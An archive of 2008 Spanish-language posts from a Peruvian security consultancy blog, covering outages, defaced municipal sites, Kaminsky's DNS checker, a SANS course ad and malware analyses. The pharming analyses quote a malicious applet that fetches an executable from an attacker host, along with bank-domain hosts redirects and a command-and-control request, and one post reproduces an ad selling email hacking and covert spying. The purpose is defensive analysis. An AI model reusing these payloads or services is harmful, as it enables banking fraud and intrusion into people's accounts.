Archive for the ‘Alerts’ Category

Servicios críticos ¿de fin de año?

Monday, December 29th, 2008

Hace no pocos días atrás, los lectores del ISC, ratificaron la caída de los servicios de la red inalámbrica de AT&T. AT&T es una de la Big 4 en los Estados Unidos, y por ende, una caída en uno de sus servicios cuestiona al resto de clientes de los otros servicios complementarios o suplementarios, pero de paso, también alerta a la misma compañía y al resto de compañías, aún las no Big 4, a asegurar las contingencias para responder ante una caída de servicios esenciales o críticos durante el fin de año.

En el Perú, según el diario Gestión (lunes 29/12/09) sólo en Lima, se estarían realizando unos 50 eventos de fin de año, en lo que a música cumbia refiere. Se menciona allí que un evento de los más baratos, sólo recaudaría unos S/. 300,000 (bruto).

Un pequeño corte de energía sólo en Lima, sin contar los clubes alejados, significaría (multiplicación previa) una pérdida de S/. 15,000,000. Recuerde que sin luz, no hay baile, y sin baile, casi nadie consumirá los productos añadidos, durante esas celebraciones masivas.

Desde luego, no es sólo prioridad de las empresas abastecedoras de energía, sino de las propias compañías detrás de la industria del entrenenimiento más esperada de fin de año.

Algún otro servicio crítico de fin de año ¿la telefonía, el transporte? Posiblemente sí, pero no como en otras fechas no tan disipadas. Por supuesto, este post, no es para los costeños que agradan de pasar la noche del 31 en las playas, a la luz de una fogata, o quizás sólo a la luz de la luna, excepto si trabaja en el área de seguridad de operaciones/TI de una compañía de infraestructura crítica energética.

JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría

¿Dónde están los ‘defacers’ compatriotas?

Monday, October 13th, 2008

Hace tiempo que no se veían desfiguraciones locales (TLD .PE) en Zone-H. Las últimas pocas visitas (defacements), que hemos visto, han sido mas bien de teams extranjeros. Efectivamente, al ver Zone-H notará que ya casi no existen defacers locales haciendo de las suyas a páginas web del TLD .PE (Perú).

¿será que los defacers locales está invirtiendo sus horas en otros lugares más “paradi$iacos”?


Uhm… ¿Son sólo sospechas?

Enredaré un poquito esta pregunta mientras parafraseo lo que una compatriota me dijo hace unos años en Camino Inca: “Yo suelo viajar dos a tres veces al año para hacer turismo, y 1 de cada 3 de esos viajes lo hago a alguna región del Perú (generalmente esta), en donde la tasa de extranjeros supera los 9 a 1. Sin embargo, cuando viajo a lugares fuera de Perú, específicamente Rep. Dominicana, hallo que casi todos los turistas son peruanos ¿es una diferencia de costo? No. Sólo, el poco deseo de conocer lo nuestro, y alucinar ser rico por unos cuantos días“.

Si esto es lo que pasa con los defacers locales, entonces -quizás- sea porque hallaron algún bonito parai$o donde pasarla bien, sólo hasta que alguien con más poder y sapiencia les compre el boleto de regreso a “The Matrix“.

PD: Algun(os) defacer(s) local(es) parece(n) haberse reformado, al cambiar de actividad. Ojalá eso suceda con la mayoría.

Aquí, algunas muestras de los ciber turistas extranjeros:
Site: http://www.msi.gob.pe/portal
Defaced by: LatinHackTeam
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=7951986/

Site: http://munilahuaytambo.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034601/

Site: http://muniantioquia.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034575/

Site: http://munianchucaya.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034574/

Site: http://municocachacra.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034577/

Site: http://municarampoma.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034576/

Site: http://munisurcohuarochiri.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034605/

Site: http://munihuarochiri.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034579/

Site: http://munihuachupampa.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034578/

Site: http://munitupicocha.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034606/

Site: http://munilaraos.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034602/

Site: http://munisanbartolome.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034604/

Site: http://munimariatana.gob.pe
Defaced by: Iran Black Hats Team
OS: Linux
Details: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=8034603/

CTO
JaCkSecurity
Conocimiento, Conciencia y Consultoría

Técnica de “El Acertijo”, Kaminsky

Monday, August 4th, 2008

Varias semanas atrás estuvimos averigüando la forma en que Dan Kaminsky determinaba cúando un DNS era vulnerable a su famoso hallazgo, al usar el DNS CHECKER en Doxpara.com.

Inicialmente pensamos en la posibilidad de recrear el DNS CHECKER vía un viejo y útil programa llamado, tcpreplay, bajo la premisa que a Kaminsky se la había fugado parte o toda la cadena de explotación, pero no fue así.

Luego de montar un DNS vulnerable en nuestro lab, descubrimos que los paquetes eran muy inofensivos, pero no quisimos dejar tanto esfuerzo en un simple, no se puede. Quisimos ir más allá, y no despreciar el análisis de los paquetes capturados, contra nuestro DNS vulnerable. Sugerimos que lleve el curso SEC503 si desea aprender cómo hacer esto.

Al analizar los paquetes, observamos renuencia de paquetes. Ellos no eran otra cosa que un prolongado juego de acertijos (por eso el título arriba) en el que estuvo entretenido nuestro DNS. Los acertijos a que nos referimos eran (como puede ver abajo) varias respuestas CNAME sucesivas para una consulta de un registro tipo A, aquí una representación cinematográfica de lo visto:

Interprete el escenario así:
[192.168.1.19] como Batman (nuestro DNS vulnerable)
[209.200.168.66] como El Acertijo (el servidor DNS de Kaminsky)
[190.232.39.215] como El público de la película (PC que hace click en el DNS Checker)

La técnica, que hemos bautizado aquí como “la técnica del acertijo”, es muy interesante. Si bien acá es usada para diagnosticar la vulnerabilidad descubierta por Kamisky, esta, puede ser usada para otros fines futuros. Observe, que la técnica de responder con acertijos, es una forma muy útil de provocar más de una (seudo) sesión (seuda por lo de UDP) a fin de aprender más del host que inicia la sesión. Por otro lado, si piensa por un momento que las respuestas con acertijos son agotadoras (como lo pueden ser las preguntas repetidas de un infante), entonces entenderá -también- que esta técnica puede ser usada para intentar agotar los recursos de un servidor DNS (tarea para los researchers que quieran crackear un BIND-acertijo)

En suma, Kaminsky no sólo nos ha mostrado (BlackHat 2008) su vulnerabilidad, también nos ha dejado algo más (doxpara.com), sólo hacía falta un poco de análisis.

Staff
JaCkSecurity
Conocimiento, conciencia, consultoría

Aviso de SANS a la comunidad peruana

Tuesday, July 8th, 2008

SANS is bringing Sec 503: SANS Intrusion Detection In-Depth to your local community! Beginning on September 6th , SANS Mentor Javier Romero will be leading this class in Lima. For complete course details, please click on http://www.sans.org/info/30083.

Why Choose the Mentor Program?
The Mentor Program, http://www.sans.org/info/30088, consists of small, local run, 10 week classes (actually, in Peru it will running on 6 weeks) utilizing the same great SANS coursework presented at the larger conferences. Mentors and students report several major advantages to the Mentor format: Cost savings, time to digest the material, convenient evening classes, and community networking.

COST SAVINGS: Is the slowing economy resulting in reduced training budgets? With the SANS Mentor program, you save 25% off the regular SANS tuition fee with the ability to save even more with group discounts (see below). No need to spend money on travel and living expenses or spend a week away from the family.

PACED STUDY: Take 6 weeks not 6 days to work through and understand the material. Past students report that the slower pace allows them to absorb and apply the information. Each session provides you the opportunity to apply the materials the next day when you return to the office!

EVENING CLASSES: The Mentor program provides a method for learning the SANS materials and working towards a GIAC certification without taking time off from work.

COMMUNITY NETWORKING: The Mentor program allows you to work with local security professionals in an open discussion format. This community networking has been identified by students as a major benefit of the Mentor program.

One recent Mentor student commented, “I thought that the class was great. I would consider taking another SANS Mentor Program class. It was much more convenient than traveling and I had the ability to review material at my own pace.”

A SANS Institute course delivered locally in Lima by an experienced SANS Mentor who will lead you over a comfortable and convenient schedule, saving you money, while giving you the opportunity to network with local security professionals. What a great combination!! Plus SANS promises you will be able to use what you learn in the classroom as soon as you return to the office.

TUITION DISCOUNTS!
SANS offers group registration discounts for 2 or more students who register from the same organization. To obtain the Group Discount fee and Registration Code offered for this course, contact Miranda Ruddick at mentor[@]sans.org PRIOR to registering, and provide the names and
e-mail addresses of all the students registering within your organization.

Does this sound like the kind of training that would help you be more effective in your job? Then register today at http://www.sans.org/info/30083 and see for yourself the excellent value
of SANS training and GIAC certification!

SPECIAL MENTOR OFFER! Write “recruited by mentor” on the web form (under the text box “COMMENTS”) and the mentor will give you two additional hours of a special security workshop.

Seguridad web en datacenter de terceros

Tuesday, June 10th, 2008

Si vas a alojar tu web en una granja de servidores dedicada a hospedar otras, es recomendable solicitar al proveedor el aseguramiento de la LAN vía directivas estrictas de protección contra envenenamiento de tabla ARP.

El amago de secuestro que le procuraron a la web de Metasploit es un ejemplo claro de la situación. Así, que ya sabe qué pedirle de nuevo a su proveedor de hosting y colocation para estas fiestas patrias que se acercan.

Javier Romero, CTO
JaCkSecurity
Conocimiento, Conciencia y Consultoría

Terrorífica amenaza por mezclar Microsoft + Apple

Sunday, June 1st, 2008

Este post va dedicado para aquellos usuarios de Windows que aún no quieren dejar de usar privilegios altos en sus estaciones mientras navegan.

Según Microsoft existiría una nueva amenaza combinada para quienes hayan instalado el navegador de Apple en sus Windows. Al parecer, Safari permitiría silenciosamente la instalación de cualquier ejecutable que así se lo pida desde alguna página maliciosa, cuando corre en Windows.

Quien sino -especialmente- los más geek han probado Safari en sus Windows, seguramente para tener la ligera sensación de una Apple, o para experimentar de la velocidad de ejecución de este navegador, además de otras cosas.

A ellos, los especialistas de seguridad de Microsoft les recomiendan la desintalación y no uso de Safari en sus sistemas Windows (XP y Vista) hasta que Apple o Microsoft mismo resuelvan esta debilidad, que los amenaza por usar Safari.

Si el mensaje no es claro, no importa, porque la misma empresa Microsoft pone -tal si fuera premio consuelo- la salvedad que aún no han observado explotación activa de esta debilidad en la red.

No nos engañemos, la seguridad es un estado mental que todos debemos combatir día a día con noticias como esta, especialmente cuando se tiene algo de Apple (de quienes la consideran segura) en una Windows (de quienes lo consideran la más insegura).

Mucho cuidado, usted está advertido.

Staff
JaCkSecurity
Conocimiento, Conciencia, Consultoría

Nuevo pharming aprovecha problema de farándula peruana

Tuesday, May 13th, 2008

JaCkSecurity ha documentado un pharming que recibiese el martes 13 mayo 2008 (Tue, 13 May 2008 19:02:28 -0400)

EVIDENCIA PRINCIPAL

To: javier@jacksecurity.com
Subject: Video parodia de Tula Rodriguez y su embarazo
From: Maria Isabel

Hola;
Maria te recomienda la siguiente noticia: Video Parodia (burla) de Tula Rodriguez y su embarazo
URL: http://club-classic.nl/noticias/Video_parodia_de_Tula_Rodriguez_y_su_embarazo.html
Mira este video je je, se aprecia a una joven que imita a Tula al mejor estilo de una artista cómica
y cuenta de manera sarcástica el momento de la inusual confesión.
Esperamos que sea de tu agrado.
Saludos,

Análisis principal

Invocación maliciosa:
< a p p l e t name="link" code="Inicio.class" archive="http://boardpix.com/lehigh/content/Crow/ link . jar" height="10" width="1"> < p a r a m name="url" value="http : // boardpix . com /lehigh/content/Crow/xxxxxxxx.exe"> < / applet >

Análisis del binario que trata de instalarse sigilosamente:

http://www.threatexpert.com/report.aspx?md5=d010e2779c2a175ada1d9a548654bbfe

Datos del archivo referido dentro del binario:
72.249.25.219 viabcp.com
72.249.25.219 http://viabcp.com
72.249.25.219 www.viabcp.com
72.249.25.219 pagum.com
72.249.25.219 http://pagum.com
72.249.25.219 www.pagum.com
72.249.25.219 peb1.bbvanetlatam.com

Servidores de terceros afectados en el pharming:
club-classic.nl (donde se aloja la trampa visual)
boardpix.com (donde se aloja el binario)
no-problem.com.mx (donde se aloja las direcciones IP referidas por el binario)

Cabecera del correo original

From – Tue May 13 18:02:58 2008
X-Account-Key: account2
X-UIDL: UID17353-1168226604
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-path:
Envelope-to: javier@jacksecurity.com
Delivery-date: Tue, 13 May 2008 19:02:37 -0400
Received: from jsadmin by a2s5.a2hosting.com with local-bsmtp (Exim 4.68)
(envelope-from )
id 1Jw3Vs-00025y-Uy
for javier@jacksecurity.com; Tue, 13 May 2008 19:02:37 -0400
X-Spam-Checker-Version: SpamAssassin 3.2.3 (2007-08-08) on a2s5.a2hosting.com
X-Spam-Level: **
X-Spam-Status: No, score=2.8 required=5.0 tests=HTML_MESSAGE,
HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,RDNS_NONE autolearn=disabled
version=3.2.3
Received: from [74.53.114.5] (helo=demodocus.site5.com)
by a2s5.a2hosting.com with esmtps (TLSv1:AES256-SHA:256)
(Exim 4.68)
(envelope-from )
id 1Jw3Vs-00025g-EC
for javier@jacksecurity.com; Tue, 13 May 2008 19:02:28 -0400
Received: from idham by demodocus.site5.com with local (Exim 4.68)
(envelope-from )
id 1Jw3Vd-00032t-Iv
for javier@jacksecurity.com; Tue, 13 May 2008 18:02:13 -0500
To: javier@jacksecurity.com
Subject: Video parodia de Tula Rodriguez y su embarazo
From: Maria Isabel
Content-type: text/html
MIME-Version: 1.0rn
Message-Id:
Date: Tue, 13 May 2008 18:02:13 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname – demodocus.site5.com
X-AntiAbuse: Original Domain – jacksecurity.com
X-AntiAbuse: Originator/Caller UID/GID – [33075 501] / [47 12]
X-AntiAbuse: Sender Address Domain – demodocus.site5.com
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php indexx.php
X-Source-Dir: khairilidham.com:/public_html/content

Enlaces de terceros que fueron usados:

http://www.elgonzi.com/2008/05/video-parodia-de-tula-rodriguez-y-su.html

http://www.youtube.com/watch?v=Q4QwiLk183o

Staff
JaCkSecurity
Conocimiento, Conciencia y Consultoría

Kraken ¿qué tiene de particular?

Wednesday, April 9th, 2008

Posiblemente, lo único de particular que tiene Kraken sea el hecho de haber cubierto varios medios noticiosos del Internet, en sólo una semana.

Tal parece que la moda de hoy (2008) es hablar de botnets nuevas, categorizadas no por su peligrosidad, ni ferocidad, sino por su tamaño (400,000 PCs en el caso de Kraken, que es comparada con Storm Worm de 200k), muy contrario a lo que en el pasado se hacía con los virus, donde sólo valía su peligrosidad, y a veces hasta su rápidez mediática, para convertirlas en noticia.

Sin embargo, como en todo, la verdad pocas veces noticia. Las botnets -en realidad- son cuantiosas en todo el mundo, pero con un pequeño número de zombis. Un mismo atacante puede manejar varias botnets, todas ellas, pequeñas en población. El negocio está en no ser detectado, no en ser detectado. Por esa razón, nace la suspicacia de quiénes son -en realidad- los que crean estas botnets “supuestamente grandes”.

Como sea, esta es una prueba más que los virus son historia: ¿acaso no también los antivirus?

Para su curiosidad de Kraken, lea más este blog.

Javier Romero
JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría

hackeo msn yahoo gmail hotmail

Friday, March 7th, 2008

Interesante anuncio web (Ya existe una forma de satisfacer a esa audiencia que anda ambrienta de delinquir):

hackeo msn yahoo gmail hotmail
Localización: Lima
Fecha: 29-02-2008
Teléfono: 0188193136

Contactar Anunciante
Visitas: 42
Hackeo msn
cada día son mas la gente que dice saber sacar contraseñas de correo , asi que comprendo a quienes no quieran creerme .

mi sistema de trabajo funciona así.
usted me dice la cuenta que quiere hackear ….
yo procedo a realizar el trabajo y en cuanto tengo la contraseña (no mas de 2 días) ,

le doy las pruebas suficientes para recién cobrar , antes no cobramos nada ,
además de vender contraseñas , podemos también darte las conversaciones (anteriores)de MSN entre 2 correos que tu nos indiques. Por un precio adicional podemos darte mas datos como información física del PC . Capturar su computadora y gravar todo cuanto se haga o diga desde su PC.
nuestro servicio es nuevo y no te hacemos perder el tiempo ni tu dinero, solo pagas cuando te mostramos el mail hackeado , para poder contactarnos solo escribe a cleber_leo2@hotmail.com, y cuéntanos tu caso . nosotros nos encargamos de ofrecerte las posibles soluciones y logramos resolverlo ..asta el final ..es un servicio personal ..
el servicio es totalmente confidencial y anónimo , en ningún momento la victima podrá notar que tu estas vigilando su correo , el programa es nuestro (creado por nosotros)y solo necesitas los password de las personas que quieras ver sus
conversaciones.
te invitamos a contactarnos . solo pedimos seas una persona seria y responsable , recuerda que también ayudamos en caso muy delicados (infidelidad , secuestros , suplantación de identidad , engaños , usurpación , etc.)
condiciones .

1 No es un servicio gratuito
2 bajo ninguna condición enviamos ningún tipo de contraseña asta no recibir el pago
3 no cobramos nada por intentar hackear la cuenta
4 no cambiamos el password , te doy el password original
5 el costo es de 50 dólares por cada cuenta y 60 dólares por el programa para ver las conversaciones de msn sin que se den cuenta
6 es totalmente anónimo.
7 no es necesario que la victima visite su correo, nosotros trabajamos en un nivel superior
8 el plazo máximo para los password es de 2 días
9 el único mail de contacto es cleber_leo2@hotmail.com

ayacucho perú 2008

Aviso a ciber-ciudadanos de Perú, Policías Informáticos sin WWW

Monday, February 25th, 2008

La semana pasada recibimos una llamada de un cliente nuestro, en el que se nos informara de la falla en la resolución de dominio del sitio web de la Policía Informática. Hasta allí, no creíamos que pudiera significar mayor problema que no pudiera resolver la DIRINCRI o el auspiciador de su dominio y sitio web, el cual tampoco responde, por una falla aparentemente diferente. No obstante, luego de ver lo que le sucedió al sitio web del Scotland Yard (véa más abajo), era importante denunciar y/o advertir el posible riesgo al que pudiera estar expuestos aquellos ciber-ciudadanos -más neófitos- que fueran conocedores del sitio web www . policiainformatica . gob . pe (Copia en 4law).

Defacement del Scotland Yard

Debido a la advertencia legal en el sitio web www.nic.pe, no es posible colgar el pantallazo donde se indica la no existencia del dominio citado, como para perpetuar este post.

Por otro lado, un colega y alumno de esa entidad ya fue notificado para ponernos al corriente de cualquier cambio y solución pronta que se dé a este problema.

La única URL disponible pero sin información oportuna es la citada por ahora en la web de PNP.

IMPORTANTE:

Tome especial cuidado de este aviso no lo subestime. En uno de los últimos post del auspiciador de la citada web, el autor retó a los crackers limeños y amigos de cracker CiberAlexis a que lo hackeen.

Idealmente la mejor recomendación para no terminar visitando el sitio web de algún cracker -enemigo de la Policía Informática (DIRINCRI) y enemigo del auspiciador (citado arriba), sería el enlazar a través de los recursos de la web oficial de la PNP cuyo URL es: http://www.pnp.gob.pe/enlaces.html, PERO, por el momento, eso podría ser igual de terrible, debido a que la misma página sigue apuntando a la web que no responde (www . policiainformatica . gob . pe)

Visíte nuestro blog, en cuanto tengamos más información, y le proveeremos el nuevo recurso web de la DIRINCRI.

Staff
JaCkSecurity

Conocomiento, Conciencia, Consultoría

Disk encryption, el último Samurai

Friday, February 22nd, 2008

Para quienes ya son concientes de los peligros a los que se ve expuesta la información en los equipos portátiles, y que por ello han adquirido herramientas de cifrado de datos desde el disco, ahora deben sobreponerse a una nueva amenaza: “Cold boot attacks” contra las llaves de cifrado.

Aquí una video, desarrollado por los autores de éste nuevo tipo de amenaza “real”.

Análisis de pharming AV-Speedy

Friday, February 1st, 2008

En unas de mis cuentas personales, con fecha 09 de enero 2008, recibí un falso aviso de Telefónica que contenía un enlace hacia un supuesto antivirus importante para mi seguridad.

Nombre: AV-Speedy.exe
Tamano archivo: 192512 bytes
MD5: 2196150802bc7b9d5448f918ef0c4e04
SHA1: 16c486e892e41876210992d1544b40d9ba0fcbaf

Al correrlo en máquinas virtuales, primero con bajos privilegios (con resultado inexitoso para el malware), y luego con altos privilegios, capturé lo siguiente:

Vía netstat

Conexiones activas
Proto Dirección local Dirección remota Estado PID
TCP 192.168.131.65:1039 67.159.45.52:80 ESTABLISHED 248
[AV-Speedy.exe]

Vía windump

Ver adjunto

Tráfico de la captura autómata
Iniciado inmediatamente después de ejecutar el código AV-speed.exe, se observaron los siguientes datos importantes:
Guest virtual: 192.168.131.65
1er. destino: 200.48.225.130 (DNS de Telefónica) – dato ligeramente irrelevante
2do. destino: 67.159.45.52 (www.proxymafia.net) – comando central del malware

Data dentro del tráfico autómata
Al revisar, someramente, el contenido de la captura, se observó los siguientes datos importantes:
1er. dato: www.proxymafia.net (consultado vía DNS, al DNS por defecto de la PC virtual)
2do. dato: GET./surf.php (primer pedido del malware al comando central)
q=aHR0cDovL2JyaWFuc2VhZ3JhdmVzLmNvbS9wcm9maWxlcy9ob3N0LnR4dA%3D%3D&hl=3ed
3er. dato: host.txt (información enviada por comando central al malware)
66.49.193.228 www.hotmail.com
66.49.193.228 hotmail.com
66.49.193.228 www.viabcp.com
66.49.193.228 viabcp.com

Análisis de los datos extraidos
A) Proxymafia.net (67.159.45.52)
Perteneciente a una compañía inglesía y registrado vía GoDaddy.
Consulta vía www.netsol.com

Registrant:
Jack Cator
BCM Netco Solutions
London, WC1N3XX
United Kingdom
Created on: 30-Nov-06
Expires on: 30-Nov-08
Last Updated on: 30-Nov-07

B) anonr.com (DNS Provider)
Perteneciente a la misma compañía inglesía, vea la dirección IP (incluso).
Consulta vía DNS y www.netsol.com

proxymafia.net nameserver = ns1.anonr.com
proxymafia.net nameserver = ns2.anonr.com
ns1.anonr.com internet address = 75.126.48.147
ns2.anonr.com internet address = 67.159.45.52
Created on: 18-Oct-06
Expires on: 18-Oct-08
Last Updated on: 18-Oct-07

C) 66.49.193.228 (pharming)
Vía un get a http://66.49.193.228/, responde la comunidad Cardcaptor Redeemer. Curiosamente el argumento de CardCaptor se basa en que la protagonista tiene que capturar cierto número de tarjetas. Tal parece que quien hace esto, lo ve en cierto modo cómico o en juego.

Conclusiones tempranas
El código del comando central del malware, que no es una botnet, sigue activo en el web www.proxymafia.net. No es determinable el precisar, si la principal institución afectada por este pharming hizo o no algo por eliminar el código surf.php de la web de www.proxymafia.net. Sin embargo, si es concluyente que desde el 09/01/2008 hasta 21 días luego de mi análisis, el comando central sigue activo. Resta aún analizar otros componentes como la visita simulada a la web medicada www.viabcp.com desde esta PC virtual infectada.

JaCkSecurity, Staff
conocimiento, conciencia y consultoría

El negocio del SPAM

Sunday, January 20th, 2008

Les dejamos con un curioso aviso laboral, extraído de nuestro buzón anti-spam.

ASUNTO: NECESITO URGENTE CON EXPERIENCIA, SUELDO S/. 1,000 NUEVOS SOLES

DISEÑADOR/A GRAFICO WEB JOVEN HONESTO Y RESPONSABLE QUE SEPA TRABAJAR POR OBJETIVOS Y METAS CON CONOCIMIENTOS BASICOS DE:

- DISEÑOS DE AVISOS PARA MAILING MASIVOS.
- DISEÑOS DE PAGINAS WEB HTML, PHP Y FLASH.
- DOMINIO DE PHOTOSHOP, COREL DRAW, ETC.
- DOMINIO DE DREAMWEAVER, SCRIPTS, FIREWORK, ETC
- PROGRAMACION EN PHP Y BASES DE DATOS MYSQL.
- EXPERIENCIA EN EMPRESAS DE HOSTING E INTERNET.

SUELDO BASICO S/. 1,000 NUEVOS SOLES.
PARA TRABAJAR EN LIMA – LOS OLIVOS
DE 9 A 6 P.M. DE LUNES A VIERNES.
GRATO AMBIENTE DE TRABAJO E INCENTIVOS.

INTERESADOS ENVIAR MUESTRAS DE TRABAJOS (INDISPENSABLE) A basesperuanas@speedy.com.pe

INFORMES 531-2046 9930-5440 825*1861

P.D. PROXIMAMENTE ESTAREMOS NECESITANDO OPERADORAS PARA VENTAS DE HOSTING QUE SEPAN A LA VEZ DAR SOPORTE Y CONFIGURACIONES.

Para consuelo de todos, este aviso no dice: “Se busca botnets para envío de SPAM”.

Fallas inesperadas de energía en Lima

Monday, January 14th, 2008

Según el diario Peru.21, la repentina falla de energía que sufrió varios distritos de Lima (Perú), el pasado 9 de enero, se debió a la paralización de la planta de Camisea. Las dos compañías proveedoras de energía, como es Edelsur y Edelnor, tuvieron que desabastecer de energía a varias viviendas, debido a que parte del suministro se obtiene gracias a turbinas que aprovechan el gas de Camisea, y no el de las centrales hidroeléctricas del Perú.

En el caso de Edelnor, se sabe que la falla se complicó aún más cuando una de las dos turbinas que operan a gas, no pudo conmutar a diesel.

Aunque la noticia señala que el corte fue hacia viviendas, sabemos bien que los afectados no fueron sólo urbanizaciones habitacionales, lo que complicó las operaciones corrientes en más de un negocio, excepto aquellos que tuvieron algún plan de contingencia.

No obstante, nos preguntamos, si sería posible que la coincidencia desfavorezca tanto, al punto de producirse una falla en paralelo a las centrales hidroeléctricas (cualquiera de sus diversos puntos críticos en ella) y a la planta de producción de gas natural que ahora sabemos abastece a las empresas proveedoras de energía. ¿Dos fallas en paralelo? No es nada desquiciado, las fallas en paralelo son posibles (piense: falla la planta de gas, y falla la turbina que intentó conmutar a diesel).

Javier Romero
JaCkSecurity, CTO

Malware in China

Monday, January 7th, 2008

Esta es una idea terrorífica, pero finalmente un riesgo potencial. Imagine que un día alguien o algo logre que cada nuevo producto manufacturado en China logre salir con un malware incorporado antes de dejar la planta. Imagine el potencial egemónico que esto daría al villano que logre penetrar las plantas de manufactura de los appliances, gadgets y todo objeto que se conecte a las PCs del mundo. ¿Es esto acaso una idea para sembrar terror?

La respuesta es no. En días pasados, los incident-handlers del ISC aseguran haber recibido reportes de equipos USB, específicamente de cuadro de fotografías conectables vía USB. Puede ver los detalles de los errores que hace de esta sospecha de malwares en estos dispositivos en la web del ISC.

Sin embargo, no sólo los usuarios son los que deben estar alerta a esta realidad. En realidad es un problema potencial para todos, organizaciones manufactureas, aduaneras, retailers y gobiernos. Este riesgo puede convertirse en una poderosa herramienta para iniciar una ciberguerra silenciosa, o aún peor, para golper con propaganda negativa al país manufacturero más importante del mundo. El riesgo daña a muchos, y aún a quien menos se piensa.

Mucho cuidado, todos debemos estar alerta. Recuerde casi todo es manufacturado en China, y casi toda la propaganda contra China es generada en occidente, todo, excepto “nuestros ojos y nuestras mentes”.

Javier Romero
JaCkSecurity, CTO
conocimiento, conciencia y consultoria